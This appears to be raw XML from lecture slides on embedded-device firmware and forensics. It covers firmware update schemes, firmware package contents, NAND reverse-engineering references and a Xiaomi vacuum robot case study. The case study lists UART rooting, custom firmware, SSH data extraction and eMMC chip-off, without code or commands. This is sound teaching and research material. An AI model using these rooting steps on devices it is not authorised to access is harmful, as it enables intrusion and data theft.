                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UBI images: UBIFS Dumper: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/nlitsme/ubidump/blob/master/README.md</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JFFS2 images: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/sviehb/jefferson</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5C2A857-0E7C-A942-BEF5-6FB49424BC0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429398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113983"/>
            <a:ext cx="11561612" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software processes and formats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483747" y="1476173"/>
            <a:ext cx="11224506" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Updating FW</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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Firmware Update function in the bootloader</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USB-boot recovery</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 Active and Passive Partitions, or "dual copy".   See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2"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New firmware is written to a safe space and integrity-checked before it is activated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2"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Old firmware is not overwritten before new one is active </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Contents of FW packages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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Bootloader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Kernel</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File-system images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User-land binaries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Resources and support files</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Web-server/web-interface</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">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Apps </a:t>
            </a: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B3B9A93-ED43-4845-A29D-6F2AA10EC791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2679448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871AB-638B-40D9-92E1-12CC2B71D777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="75681"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NAND	references</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0403D278-D24A-4CB9-986E-0D85A466CCAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389743" y="1747266"/>
            <a:ext cx="11428183" cy="4642138"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Blackhat USA 2014: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Jeong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Wook (Matt) Oh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Introduction to the communication protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Soldering/Unsoldering of NAND flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How-to reverse engineer NAND formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“From NAND chip to files” by Jean-Michel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Picod</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>References:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.blackhat.com/docs/us-14/materials/us-14-Oh-Reverse-Engineering-Flash-Memory-For-Fun-And-Benefit-WP.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.blackhat.com/docs/us-14/materials/us-14-Oh-Reverse-Engineering-Flash-Memory-For-Fun-And-Benefit.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.j-michel.org/blog/2014/05/27/from-nand-chip-to-files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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B5444B14-6ED8-9446-8AED-00C9EB8F7EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1667895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82C240-814A-44BF-8A1C-D778EA5A8695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164892" y="245822"/>
            <a:ext cx="11417508" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Examples: Xiaomi/Rockrobo Mi Vacuum Robot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64D63578-0036-466E-95BA-F62D3A82A01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1830389"/>
            <a:ext cx="10972800" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Platform:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OS: Ubuntu 14.04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SOC: Allwinner R16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Flash: eMMC (4GByte)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RAM: 512 Mbyte DDR3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reconnaissance:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dump partitions via UART</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Connect device to cloud account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Grafik 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{659A32CB-820D-4A6C-B0FA-8E44590447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09586" y="3147933"/>
            <a:ext cx="2982413" cy="2978231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{440C3AB3-FACE-C342-8739-1B40A38EB1DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="524492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0C21E-863D-41E1-A20D-3E5B289ECF70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726638" y="243265"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mi Vacuum Robot data extraction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AC3398D-C023-443D-A88A-A5B780BCAB30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Rooting methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Root shell via UART or custom firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Extraction of data via SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alternative: removing and dumping of the eMMC flash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5325101E-D367-4062-8E41-E871EBE14A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11699438" y="2728452"/>
            <a:ext cx="461665" cy="3580275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="vert270" wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/dgiese/dustcloud</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Grafik 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA4C66D-C1BF-4200-85B4-D5F3F62F68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84635" y="3540549"/>
            <a:ext cx="4221619" cy="2768178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3AE51FA-750F-AE4C-A109-33C8F70A335E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2517886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E9935-C260-492A-80C5-379C00A45ADB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="216167"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eMMC layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Inhaltsplatzhalter 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BF6887F-FA15-49D3-9551-BCEBB28D35E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
